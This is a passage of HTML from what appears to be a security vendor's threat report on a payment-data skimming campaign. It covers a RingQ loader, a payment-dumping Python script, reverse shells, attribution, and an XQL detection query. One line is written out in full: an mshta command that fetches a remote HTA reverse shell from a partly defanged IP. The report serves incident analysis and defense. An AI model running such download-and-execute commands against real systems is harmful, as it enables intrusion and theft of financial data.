data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-261509-137319-3.png" alt="Screenshot of a code editor displaying a simple code snippet with the 'using System;' directive and an internal class declaration named '<Module>'." width="400" height="183"><figcaption id="caption-attachment-137328" class="wp-caption-text">Figure 2. Empty .NET code.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>Although this is not always the case, Figure 3 shows how dnSpy can identify the usage of mixed mode assemblies and warns about the unmanaged code, also showing the native entry point.</p><figure id="attachment_137330" aria-describedby="caption-attachment-137330" style="width: 550px" class="wp-caption alignnone"><img class="wp-image-137330 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-263861-137319-4.png" alt="A screenshot of code indicating that the assembly contains unmanaged code, with specific sections highlighted, using the .NET Framework 4." width="550" height="274"><figcaption id="caption-attachment-137330" class="wp-caption-text">Figure 3. dnSpy warning on the usage of unmanaged code.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>When jumping to the native entry point address, it is possible to identify the native code as shown in Figures 4 and 5.</p><figure id="attachment_137332" aria-describedby="caption-attachment-137332" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137332 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5.png" alt="Screenshot displaying source code in an IDE, featuring lines of assembly language associated with the DllMainCRTStartup function. Some of the code is highlighted in a red box and a segment is underlined in red on the first line." width="900" height="495" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5.png 1594w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5-786x432.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5-1274x700.png 1274w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5-768x422.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-266677-137319-5-1536x844.png 1536w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137332" class="wp-caption-text">Figure 4. Native entry point content.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><figure id="attachment_137334" aria-describedby="caption-attachment-137334" style="width: 600px" class="wp-caption alignnone"><img class="wp-image-137334 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-270019-137319-6.png" alt="Screenshot of a code snippet written in C/C++ that appears to handle process attachment and detachment with function calls identified by markers pointing to specific lines." width="600" height="395" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-270019-137319-6.png 977w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-270019-137319-6-669x440.png 669w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-270019-137319-6-768x505.png 768w" sizes="(max-width: 600px) 100vw, 600px"><figcaption id="caption-attachment-137334" class="wp-caption-text">Figure 5. Native code calling the function written by the threat actor.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>By following the execution flow, it is possible to reach the malicious command executed, as identified in Figure 6. The malicious command uses <a href="https://learn.microsoft.com/en-us/previous-versions/windows/embedded/aa940701(v=winembedded.5)?redirectedfrom=MSDN" target="_blank" rel="noopener">Microsoft HTML Application Host</a> (MSHTA) <a href="https://www.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-fending-off-living-off-the-land-attacks/" rel="noopener">Living Off the Land Binaries</a> (LOLBin) to download and execute a remote <a href="https://learn.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)?redirectedfrom=MSDN" target="_blank" rel="noopener">HTA</a> (HTML Application) payload. It then <a href="https://attack.mitre.org/techniques/T1218/005/" target="_blank" rel="noopener">proxies the execution</a> of the malicious code through a legitimate and official binary.</p><figure id="attachment_137336" aria-describedby="caption-attachment-137336" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137336 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-272732-137319-7.png" alt="Image depicting a computer screen with a flowchart and assembly code. The flowchart includes steps labeled &quot;detonation proc begin,&quot; &quot;short_exit,&quot; and &quot;detonation end,&quot; connected by arrows. The code includes commands related to network data handling, and there is an emphasized portion showing a network address &quot;http://20.20.240.16/SecurityDataEntry.stra&quot;. Red arrows highlight the connection between the flowchart and specific parts of the code." width="900" height="391" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-272732-137319-7.png 1115w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-272732-137319-7-786x341.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-272732-137319-7-768x333.png 768w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137336" class="wp-caption-text">Figure 6. Embedded native code executing the malicious command.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><h3 data-section="scrollable" id="section2SubHeading2"><a id="post-137319-_up3lnvvq63qw"></a>RingQ Loader</h3><p>During the investigation, Unit 42 researchers observed the threat actor leveraging the RingQ loader as part of their arsenal. The RingQ loader comprises two main components. One is a tool that creates an encrypted file containing the binary to be loaded and executed, and the other is the loader itself, which <a href="https://attack.mitre.org/techniques/T1620/" target="_blank" rel="noopener">reflectively loads the binary</a>.</p><p>RingQ can also act as a downloader if configured to do so. Figure 7 shows the logic of the loader and the execution branches to load the encrypted file locally or remotely from a URL specified in the binary resources.</p><figure id="attachment_137338" aria-describedby="caption-attachment-137338" style="width: 602px" class="wp-caption alignnone"><img class="wp-image-137338 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-275446-137319-8.png" alt="Screenshot of a computer screen displaying code in a text editor. Various arrows indicate the most relevant parts of the code. " width="602" height="788" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-275446-137319-8.png 602w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-275446-137319-8-336x440.png 336w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-275446-137319-8-535x700.png 535w" sizes="(max-width: 602px) 100vw, 602px"><figcaption id="caption-attachment-137338" class="wp-caption-text">Figure 7. Execution logic source code from the GitHub repository.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>The samples identified in the activity covered in this article use different methods to load the encrypted payload. Figure 8 shows the value set to the Portable Executable (PE) string table resource of the RingQ loader to download the encrypted payload from a remote URL.</p><figure id="attachment_137340" aria-describedby="caption-attachment-137340" style="width: 364px" class="wp-caption alignnone"><img class="wp-image-137340 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-278509-137319-9.png" alt="Text from a code editor showing a STRINGTABLE in a programming language, including a URL link in the fourth line, configured for simplified Chinese language settings." width="364" height="100"><figcaption id="caption-attachment-137340" class="wp-caption-text">Figure 8. Remote location of the encrypted payload using the RingQ author nickname as the filename.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>The GitHub repository of the RingQ loader also includes a tool (QVM250) to tweak the resources of the PE file and include resources from original binaries in an attempt to trick and bypass some security measures. In the activity identified, one of the samples was mimicking PuTTY, a common SSH client for MS Windows (Figure 9).</p><figure id="attachment_137342" aria-describedby="caption-attachment-137342" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137342 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-281067-137319-10.png" alt="Screenshot of a software interface for PuTTY, displaying an &quot;About PuTTY&quot; dialog box with version information and buttons for viewing the license, visiting the website, and closing the dialog." width="900" height="362" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-281067-137319-10.png 1046w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-281067-137319-10-786x316.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-281067-137319-10-768x309.png 768w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137342" class="wp-caption-text">Figure 9. Fake resources included in the loader.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><h3 data-section="scrollable" id="section2SubHeading3"><a id="post-137319-_29uj6zn1x8gj"></a>Compiled Python - Dumping Payment Information</h3><p>After the adversary secured web shell access on the server, they wrote a Windows executable to disk with a <span style="font-family: 'courier new', courier, monospace;">.txt</span> file extension. Based on strings in the binary, we could determine that it was a Python script compiled to an executable with <a href="https://pyinstaller.org/en/stable/" target="_blank" rel="noopener">PyInstaller</a> (Figure 10).</p><figure id="attachment_137344" aria-describedby="caption-attachment-137344" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137344 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-283841-137319-11.png" alt="Command Prompt window open on a desktop showing error messages related to PyInstaller and the conversion of file paths to UTF-8. The prompt is located at C:\malware\strings." width="900" height="273" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-283841-137319-11.png 1344w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-283841-137319-11-786x239.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-283841-137319-11-768x233.png 768w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137344" class="wp-caption-text">Figure 10. PyInstaller compilation strings.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>Using a tool like <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener">PyInstaller Extractor</a>, we could reverse that process and extract the compiled Python bytecode. The bytecode is readable but harder to understand. By using a tool like <a href="https://github.com/rocky/python-uncompyle6/" target="_blank" rel="noopener">uncompyle6</a>, we reverted the Python bytecode to its original Python form.</p><p>The nearly 8 MB original executable boils down to a simple Python script, shown below in Figure 11. The rest of the files were artifacts of PyInstaller that allow for proper packaging and execution. The script itself is simple and uses hard-coded credentials to connect to a database in the victim’s organization and dump payment information to a <span style="font-family: 'courier new', courier, monospace;">.csv</span> file.</p><figure id="attachment_137346" aria-describedby="caption-attachment-137346" style="width: 500px" class="wp-caption alignnone"><img class="wp-image-137346 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-286781-137319-12.png" alt="Screenshot of Python code using the pyodbc module to run a SQL query on a database, fetch data, and write it to a CSV file named 'out.csv'." width="500" height="270" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-286781-137319-12.png 1289w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-286781-137319-12-786x424.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-286781-137319-12-768x415.png 768w" sizes="(max-width: 500px) 100vw, 500px"><figcaption id="caption-attachment-137346" class="wp-caption-text">Figure 11. Python script for executable.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><h3 data-section="scrollable" id="section2SubHeading4"><a id="post-137319-_a63ybt6s65b8"></a>Reverse Shells</h3><p>Once the threat actor gained a foothold on the servers by exploiting the Telerik vulnerabilities, they attempted to achieve persistence by dropping multiple web shells as well as multiple PowerShell reverse shells.</p><p>During our investigation, we observed that the threat actor installed reverse shells by executing multiple MSHTA commands that retrieved an <span style="font-family: 'courier new', courier, monospace;">.hta</span> script from a hard-coded IP address, such as the following:</p><ul>
<li><span style="font-family: 'courier new', courier, monospace;">mshta http://172[.]86.96.245/129-80.hta</span> (the <span style="font-family: 'courier new', courier, monospace;">.hta</span> file script shown in Figure 12)</li>
</ul><figure id="attachment_137348" aria-describedby="caption-attachment-137348" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137348 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13.png" alt="This image shows a computer screen with a script written in a programming language. The screen displays multiple lines of code." width="900" height="380" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13.png 2048w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13-786x332.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13-1657x700.png 1657w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13-768x324.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-289895-137319-13-1536x649.png 1536w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137348" class="wp-caption-text">Figure 12. <span style="font-family: 'courier new', courier, monospace;">129-80.hta</span> script content.</figcaption><div class="enlarge" style="bottom: 35.69px;"></div></figure><p>We observed these executions with multiple different IP addresses and file names. The IP address in the URL was also used as the command and control (C2) IP address for the reverse shell. The filename represented the port in most cases, which is shown in the first two lines in Figure 12. The <span style="font-family: 'courier new', courier, monospace;">.hta</span> file shown in Figure 13 is a VBScript that executes a Base64-encoded PowerShell command that decodes to a PowerShell script.</p><figure id="attachment_137350" aria-describedby="caption-attachment-137350" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137350 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-294029-137319-14.png" alt="Screenshot of programming code on, set in a text editor with highlighted syntax." width="900" height="872" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-294029-137319-14.png 1523w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-294029-137319-14-454x440.png 454w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-294029-137319-14-723x700.png 723w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-294029-137319-14-768x744.png 768w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137350" class="wp-caption-text">Figure 13. The reverse shellcode.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>The reverse shells were also installed by downloading a <span style="font-family: 'courier new', courier, monospace;">.ps1</span> script, which is the reverse shell, using PowerShell's <span style="font-family: 'courier new', courier, monospace;">Invoke-WebRequest</span> utility and executing it (Figure 14).</p><figure id="attachment_137352" aria-describedby="caption-attachment-137352" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137352 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15.png" alt="Screenshot of PowerShell code. " width="900" height="51" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15.png 2048w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15-786x44.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15-1920x108.png 1920w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15-768x43.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-297267-137319-15-1536x86.png 1536w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137352" class="wp-caption-text">Figure 14. PowerShell executes <span style="font-family: 'courier new', courier, monospace;">Invoke-WebRequest</span> utility.</figcaption><div class="enlarge" style="bottom: 35.69px;"></div></figure></div><div class="section-wrapper" id="section-3"><h2 id="section-3-title" data-section="scrollable"><a id="post-137319-_dedno52cgv8s"></a><strong>Attribution and Overlaps</strong></h2><p>One of the Cobalt Strike C2 IP addresses identified in this activity matches an IP address mentioned in a <a href="https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/" target="_blank" rel="noopener">Sophos X-Ops</a> report, where a similar infection chain resulted in an Ambitious Scorpius (BlackCat) ransomware attack. Since Ambitious Scorpius stopped operations after performing an <a href="https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/" target="_blank" rel="noopener">exit scam</a>, this overlap may belong to an affiliate or a cybercrime cluster used across both attacks.</p><p>The BlackBerry Research and Intelligence Team first wrote about the <a href="https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala" target="_blank" rel="noopener">Silent Skimmer</a> campaign back in September 2023. LevelBlue Labs later <a href="https://cybersecurity.att.com/blogs/security-essentials/dont-check-out-credit-card-skimming-activity-observed" target="_blank" rel="noopener">published their own findings</a>. Since then, we haven't heard much about the campaign.</p><p>A significant number of the TTPs we observed in our investigation align with the ones described in BlackBerry's blog starting from the initial access vector, which is the exploitation of publicly facing web servers. Specifically, both campaigns involved the exploitation of Telerik UI vulnerabilities that are over 5 years old.</p><p>Following initial access, there were mostly identical techniques of installing reverse shells by executing <span style="font-family: 'courier new', courier, monospace;">mshta.exe</span>, which downloads and executes an <span style="font-family: 'courier new', courier, monospace;">.hta</span> script. While in BlackBerry's incident, the <span style="font-family: 'courier new', courier, monospace;">.hta</span> file is a VBScript that downloads and executes a <span style="font-family: 'courier new', courier, monospace;">.ps1</span> script using <span style="font-family: 'courier new', courier, monospace;">certutil.exe</span>, which is the reverse shell. In the incident Unit 42 was involved in, the <span style="font-family: 'courier new', courier, monospace;">.hta</span> file is a VBScript that executes a PowerShell encoded command that decodes to a PowerShell script, which is the final reverse shell.</p><p>In the incident we were involved in, the attackers used reverse proxy tools and web shells to maintain persistence and control over compromised systems. Additionally, they leveraged GodPotato (a privilege escalation tool) and deployed Cobalt Strike for post-exploitation activities. These findings align closely with the tactics detailed in the BlackBerry blog.</p><p>The main difference between the campaigns is the method used to extract the payment and financial data. In the campaign described by BlackBerry, the attackers append malicious code to different payment-related pages that scrape the payment data. In the campaign we observed, the threat actor used a compiled Python script to connect to a database in the victim’s organization and then dumped payment information to a CSV file for exfiltration.</p><p>With all this information, in alignment with the <a href="https://unit42.paloaltonetworks.com/from-activity-to-formal-naming/" rel="noopener">Unit 42 naming convention</a> procedures, we are tracking this threat activity cluster as CL-CRI-0941.</p></div><div class="section-wrapper" id="section-4"><h2 id="section-4-title" data-section="scrollable"><strong>Conclusion</strong></h2><p>The threat actor behind Silent Skimmer has resurfaced after a year, now leveraging a new technique for scraping payment details. Despite this update, the group's TTPs remain largely consistent with previous activity. This persistence underscores the need for organizations to stay vigilant and patch vulnerabilities promptly to defend against this enduring threat.</p><p>Palo Alto Networks customers are better protected from the threats discussed in this article through the following products:</p><ul>
<li><a href="https://www.paloaltonetworks.com/cortex/cortex-xdr" rel="noopener">Cortex XDR</a> and <a href="https://www.paloaltonetworks.com/cortex/cortex-xsiam" rel="noopener">XSIAM</a> help protect against the threats described through modules including Behavioral Threat Protection and Local Analysis.</li>
<li><a href="https://www.paloaltonetworks.com/network-security/security-subscriptions" rel="noopener">Cloud-Delivered Security Services</a>, including:
<ul>
<li>The <a href="https://www.paloaltonetworks.com/products/secure-the-network/wildfire" rel="noopener">Advanced WildFire</a> machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.</li>
<li><a href="https://docs.paloaltonetworks.com/advanced-url-filtering/administration" target="_blank" rel="noopener">Advanced URL Filtering</a> and <a href="https://docs.paloaltonetworks.com/dns-security" target="_blank" rel="noopener">Advanced DNS Security</a> identify known domains and URLs associated with CL-CRI-0941 activity as malicious.</li>
<li><a href="https://www.paloaltonetworks.com/network-security/advanced-threat-prevention" rel="noopener">Advanced Threat Prevention</a> signatures exist for activity described in this article, including the CVEs mentioned.</li>
</ul>
</li>
</ul><p><a href="https://www.paloaltonetworks.com/cortex/cortex-xpanse" rel="noopener">Cortex Xpanse</a> is able to identify internet-facing instances of Telerik UI, including versions that are specifically associated with the vulnerabilities above.</p><p>If you think you might have been compromised or have an urgent matter, get in touch with the<a href="https://start.paloaltonetworks.com/contact-unit42.html" target="_blank" rel="noopener"> Unit 42 Incident Response team</a> or call:</p><ul>
<li>North America Toll-Free: 866.486.4842 (866.4.UNIT42)</li>
<li>EMEA: +31.20.299.3130</li>
<li>APAC: +65.6983.8730</li>
<li>Japan: +81.50.1790.0200</li>
</ul><p>Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the <a href="https://www.cyberthreatalliance.org" target="_blank" rel="noopener">Cyber Threat Alliance</a>.</p><p><strong>XQL Queries</strong></p><div id="crayon-672ebeddad667989036612" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate crayon-wrapped" data-settings=" minimize scroll-mouseover wrap" style="margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important; height: auto;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important; height: 18px !important; line-height: 18px !important; margin-top: -18px; display: none; position: absolute; z-index: 2;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button crayon-pressed" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button crayon-pressed" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code" style="display: none;"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea class="crayon-plain print-no" data-settings="dblclick" readonly="" style="tab-size: 4; font-size: 12px !important; line-height: 15px !important; z-index: 0; opacity: 0; overflow: hidden;">// Description: mshta.exe executing a powershell encoded command

config case_sensitive = false

| dataset = xdr_data

| filter event_type = ENUM.PROCESS and event_sub_type = ENUM.PROCESS_START

| filter actor_process_image_name = "mshta.exe"

// Filtering powershell with base64 encoded commands

| filter action_process_image_name = "powershell.exe" and action_process_image_command_line ~= "[A-Za-z0-9+\/]{50,}[=]{0,2}"

// Decoding the base64 encoded commands

| alter decoded_base64 = convert_from_base_64(arrayindex(regextract(action_process_image_command_line, "[A-Za-z0-9+\/]{50,}[=]{0,2}"),0))

| alter decoded_base64 = replex(decoded_base64, "\x00", "") // Trick to remove null bytes in decoded base64 output

| fields _time, agent_hostname, agent_ip_addresses, action_process_image_name, action_process_image_command_line, actor_process_command_line, causality_actor_process_command_line, decoded_base64</textarea></div>
			<div class="crayon-main" style="position: relative; z-index: 1; overflow: hidden;">
				<div class="table__wrapper"><table class="crayon-table" style="">
					<tbody><tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-672ebeddad667989036612-1" style="height: 15px;">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-2" style="height: 15px;">2</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-3" style="height: 15px;">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-4" style="height: 15px;">4</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-5" style="height: 15px;">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-6" style="height: 15px;">6</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-7" style="height: 15px;">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-8" style="height: 15px;">8</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-9" style="height: 15px;">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-10" style="height: 15px;">10</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-11" style="height: 15px;">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-12" style="height: 15px;">12</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-13" style="height: 30px;">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-14" style="height: 15px;">14</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-15" style="height: 15px;">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-16" style="height: 15px;">16</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-17" style="height: 45px;">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-18" style="height: 15px;">18</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-19" style="height: 30px;">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad667989036612-20" style="height: 15px;">20</div><div class="crayon-num" data-line="crayon-672ebeddad667989036612-21" style="height: 45px;">21</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-672ebeddad667989036612-1"><span class="crayon-c">// Description: mshta.exe executing a powershell encoded command</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-2">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-3"><span class="crayon-e">config </span><span class="crayon-i">case_sensitive</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">false</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-4">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-5"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-i">dataset</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">xdr_data</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-6">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-7"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">filter </span><span class="crayon-i">event_type</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">ENUM</span><span class="crayon-sy">.</span><span class="crayon-e">PROCESS </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-i">event_sub_type</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">ENUM</span><span class="crayon-sy">.</span><span class="crayon-i">PROCESS_START</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-8">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-9"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">filter </span><span class="crayon-i">actor_process_image_name</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-s">"mshta.exe"</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-10">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-11"><span class="crayon-c">// Filtering powershell with base64 encoded commands</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-12">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-13"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">filter </span><span class="crayon-i">action_process_image_name</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-s">"powershell.exe"</span><span class="crayon-h"> </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-i">action_process_image_command_line</span><span class="crayon-h"> </span><span class="crayon-sy">~</span>=<span class="crayon-h"> </span><span class="crayon-s">"[A-Za-z0-9+\/]{50,}[=]{0,2}"</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-14">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-15"><span class="crayon-c">// Decoding the base64 encoded commands</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-16">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-17"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">alter </span><span class="crayon-i">decoded_base64</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-e">convert_from_base_64</span><span class="crayon-sy">(</span><span class="crayon-e">arrayindex</span><span class="crayon-sy">(</span><span class="crayon-e">regextract</span><span class="crayon-sy">(</span><span class="crayon-i">action_process_image_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"[A-Za-z0-9+\/]{50,}[=]{0,2}"</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-cn">0</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-18">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-19"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">alter </span><span class="crayon-i">decoded_base64</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-e">replex</span><span class="crayon-sy">(</span><span class="crayon-i">decoded_base64</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"\x00"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-c">// Trick to remove null bytes in decoded base64 output</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad667989036612-20">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad667989036612-21"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">fields </span><span class="crayon-i">_time</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">agent_hostname</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">agent_ip_addresses</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">action_process_image_name</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span 